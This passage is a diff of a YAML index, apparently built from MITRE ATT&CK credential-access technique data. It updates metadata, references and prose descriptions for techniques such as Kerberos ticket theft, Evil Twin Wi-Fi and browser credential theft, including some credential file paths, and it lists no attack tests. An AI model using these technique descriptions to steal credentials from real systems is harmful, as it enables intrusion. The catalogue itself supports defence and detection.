+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44402,6 +45075,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44409,32 +45089,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -44470,7 +45186,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -44495,13 +45211,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -44510,14 +45219,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -44539,23 +45240,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -44606,12 +45298,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44623,6 +45314,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -44637,18 +45329,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -44671,37 +45363,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -44709,9 +45479,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -44720,21 +45490,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -44774,55 +45545,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -44852,6 +45578,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -44861,23 +45593,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -44914,23 +45681,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -44963,21 +45730,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -44988,7 +45754,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45022,7 +45788,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45050,7 +45816,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45061,14 +45827,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
